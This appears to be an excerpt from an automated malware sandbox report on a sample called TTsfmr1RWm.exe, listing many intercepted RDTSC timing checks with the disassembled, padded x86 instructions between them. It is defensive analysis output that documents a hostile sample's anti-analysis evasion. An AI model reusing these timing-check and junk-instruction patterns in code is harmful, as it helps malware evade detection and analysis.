Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: C23DD6 second address: C23DE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F91A0CE39AEh 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B383E0 second address: B383E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B383E6 second address: B383EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B383EA second address: B383F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: B383F9 second address: B383FF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51A03B5 second address: 51A03CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F91A0CEF8B3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51A03CC second address: 51A0405 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a movzx eax, bx 0x0000000d pushfd 0x0000000e jmp 00007F91A0CE39ADh 0x00000013 add ah, 00000016h 0x00000016 jmp 00007F91A0CE39B1h 0x0000001b popfd 0x0000001c popad 0x0000001d mov dword ptr [esp], ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51A0405 second address: 51A040F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ebx, 7EAF744Ch 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51A040F second address: 51A044A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0CE39B2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F91A0CE39B0h 0x00000010 mov edx, dword ptr [ebp+0Ch] 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 call 00007F91A0CE39ACh 0x0000001b pop esi 0x0000001c rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51A044A second address: 51A0460 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0CEF8ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b mov ecx, 299AA655h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51A0460 second address: 51A0487 instructions: 0x00000000 rdtsc 0x00000002 mov bh, al 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ecx, dword ptr [ebp+08h] 0x0000000a pushad 0x0000000b call 00007F91A0CE39B3h 0x00000010 mov edi, esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 mov di, 7296h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51C06B3 second address: 51C06B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51C06B9 second address: 51C06BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51C06BD second address: 51C06C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51C06C1 second address: 51C06DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F91A0CE39B0h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51C06DE second address: 51C06E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51C06E4 second address: 51C06F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F91A0CE39ADh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51C06F5 second address: 51C06F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51C06F9 second address: 51C071B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ebx, esi 0x0000000e call 00007F91A0CE39B2h 0x00000013 pop eax 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51C071B second address: 51C0721 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51C0721 second address: 51C0725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51C0725 second address: 51C0797 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F91A0CEF8B4h 0x00000011 adc ax, 8498h 0x00000016 jmp 00007F91A0CEF8ABh 0x0000001b popfd 0x0000001c mov ah, 0Ah 0x0000001e popad 0x0000001f push esi 0x00000020 jmp 00007F91A0CEF8B0h 0x00000025 mov dword ptr [esp], ecx 0x00000028 jmp 00007F91A0CEF8B0h 0x0000002d xchg eax, esi 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F91A0CEF8B7h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51C0797 second address: 51C07C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, bh 0x00000005 call 00007F91A0CE39B0h 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 call 00007F91A0CE39AEh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51C07C2 second address: 51C07E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 xchg eax, esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F91A0CEF8B9h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51C07E4 second address: 51C089C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F91A0CE39B7h 0x00000009 adc si, 3F8Eh 0x0000000e jmp 00007F91A0CE39B9h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F91A0CE39B0h 0x0000001a jmp 00007F91A0CE39B5h 0x0000001f popfd 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 lea eax, dword ptr [ebp-04h] 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F91A0CE39ACh 0x0000002d and cx, C468h 0x00000032 jmp 00007F91A0CE39ABh 0x00000037 popfd 0x00000038 pushad 0x00000039 mov bl, cl 0x0000003b popad 0x0000003c popad 0x0000003d nop 0x0000003e jmp 00007F91A0CE39ACh 0x00000043 push eax 0x00000044 jmp 00007F91A0CE39ABh 0x00000049 nop 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d call 00007F91A0CE39ABh 0x00000052 pop esi 0x00000053 movsx edx, si 0x00000056 popad 0x00000057 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51C089C second address: 51C08A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51C08A2 second address: 51C08A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51C08A6 second address: 51C08AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51C08F0 second address: 51C08F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51C08F6 second address: 51C0907 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F91A0CEF8ADh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51C0907 second address: 51C091B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [ebp-04h], 00000000h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 mov edi, eax 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51C09F9 second address: 51B0173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, esi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F91A0CEF8AEh 0x00000011 adc cl, FFFFFFB8h 0x00000014 jmp 00007F91A0CEF8ABh 0x00000019 popfd 0x0000001a mov ax, 6DEFh 0x0000001e popad 0x0000001f pop esi 0x00000020 jmp 00007F91A0CEF8B2h 0x00000025 leave 0x00000026 jmp 00007F91A0CEF8B0h 0x0000002b retn 0004h 0x0000002e nop 0x0000002f sub esp, 04h 0x00000032 xor ebx, ebx 0x00000034 cmp eax, 00000000h 0x00000037 je 00007F91A0CEFA0Ah 0x0000003d mov dword ptr [esp], 0000000Dh 0x00000044 call 00007F91A553BB83h 0x00000049 mov edi, edi 0x0000004b jmp 00007F91A0CEF8B9h 0x00000050 xchg eax, ebp 0x00000051 jmp 00007F91A0CEF8AEh 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c popad 0x0000005d rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51B0173 second address: 51B0179 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51B0179 second address: 51B0193 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0CEF8AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51B0193 second address: 51B0197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51B0197 second address: 51B01B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0CEF8B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51B01B2 second address: 51B01B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51B01B8 second address: 51B01BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51B01BC second address: 51B01F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F91A0CE39B8h 0x00000013 sbb cx, C658h 0x00000018 jmp 00007F91A0CE39ABh 0x0000001d popfd 0x0000001e mov edi, ecx 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51B01F6 second address: 51B01FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51B01FD second address: 51B027E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 sub esp, 2Ch 0x0000000a pushad 0x0000000b call 00007F91A0CE39B9h 0x00000010 jmp 00007F91A0CE39B0h 0x00000015 pop eax 0x00000016 mov cx, di 0x00000019 popad 0x0000001a push edx 0x0000001b jmp 00007F91A0CE39AAh 0x00000020 mov dword ptr [esp], ebx 0x00000023 jmp 00007F91A0CE39B0h 0x00000028 xchg eax, edi 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F91A0CE39AEh 0x00000030 jmp 00007F91A0CE39B5h 0x00000035 popfd 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51B0300 second address: 51B0336 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F91A0CEF8B1h 0x00000008 mov ecx, 16EBF317h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 sub ebx, ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F91A0CEF8B6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51B0336 second address: 51B0393 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, ax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub edi, edi 0x0000000b pushad 0x0000000c mov si, bx 0x0000000f mov esi, ebx 0x00000011 popad 0x00000012 inc ebx 0x00000013 jmp 00007F91A0CE39B3h 0x00000018 test al, al 0x0000001a jmp 00007F91A0CE39B6h 0x0000001f je 00007F91A0CE3B5Dh 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F91A0CE39B7h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51B0393 second address: 51B03C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0CEF8B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea ecx, dword ptr [ebp-14h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F91A0CEF8ADh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51B03C2 second address: 51B03C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51B03C8 second address: 51B03CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51B0560 second address: 51B0566 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51B0566 second address: 51B05C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0CEF8ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d call 00007F91A0CEF8B4h 0x00000012 pushfd 0x00000013 jmp 00007F91A0CEF8B2h 0x00000018 and eax, 2C1AD0E8h 0x0000001e jmp 00007F91A0CEF8ABh 0x00000023 popfd 0x00000024 pop ecx 0x00000025 mov bx, 412Ch 0x00000029 popad 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e mov esi, edx 0x00000030 mov al, bh 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51B05C1 second address: 51B05EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F91A0CE39AEh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F91A0CE39B7h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51B05EF second address: 51B0613 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 mov edi, eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F91A0CEF8B4h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51B0613 second address: 51B0619 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51B0619 second address: 51B0633 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0CEF8AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov dh, 95h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51B0633 second address: 51B0637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51B0637 second address: 51B0656 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F91A0CEF8B7h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51B0656 second address: 51B06C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F91A0CE39AFh 0x00000009 add ecx, 4C297B0Eh 0x0000000f jmp 00007F91A0CE39B9h 0x00000014 popfd 0x00000015 mov cx, C017h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebx 0x0000001d pushad 0x0000001e call 00007F91A0CE39AFh 0x00000023 call 00007F91A0CE39B8h 0x00000028 pop esi 0x00000029 pop ebx 0x0000002a popad 0x0000002b push eax 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51B06C3 second address: 51B06C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51B06C7 second address: 51B06CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51B0014 second address: 51B002F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0CEF8ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ebx, 314EF016h 0x00000012 push edi 0x00000013 pop eax 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51B002F second address: 51B0035 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51B0035 second address: 51B0069 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F91A0CEF8B1h 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F91A0CEF8AEh 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov ebx, 09A2EF80h 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51B0069 second address: 51B008F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, A2h 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007F91A0CE39B6h 0x0000000e mov dword ptr [esp], ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51B012F second address: 51B0135 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51B0135 second address: 51B0139 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51B0BE9 second address: 51B0C49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0CEF8B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop edi 0x0000000d mov edi, esi 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F91A0CEF8AEh 0x00000018 adc esi, 4FBCB708h 0x0000001e jmp 00007F91A0CEF8ABh 0x00000023 popfd 0x00000024 jmp 00007F91A0CEF8B8h 0x00000029 popad 0x0000002a mov ebp, esp 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51B0C49 second address: 51B0C4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51B0C4D second address: 51B0C6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0CEF8B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51B0C6A second address: 51B0CB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0CE39B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [769B459Ch], 05h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007F91A0CE39B3h 0x00000018 call 00007F91A0CE39B8h 0x0000001d pop ecx 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51B0CB6 second address: 51B0CDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F921248D5E5h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F91A0CEF8B5h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51B0E36 second address: 51B0E3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51B0E3C second address: 51B0E40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51B0E40 second address: 51B0E95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91A0CE39B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F92124774D2h 0x00000011 jmp 00007F91A0CE39B6h 0x00000016 cmp dword ptr [ebp+08h], 00002000h 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F91A0CE39B7h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51C0A86 second address: 51C0A96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F91A0CEF8ACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51C0A96 second address: 51C0A9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TTsfmr1RWm.exe	RDTSC instruction interceptor: First address: 51C0A9A second address: 51C0AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F91A0CEF8AEh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F91A0CEF8AAh 0x00000018 rdtsc
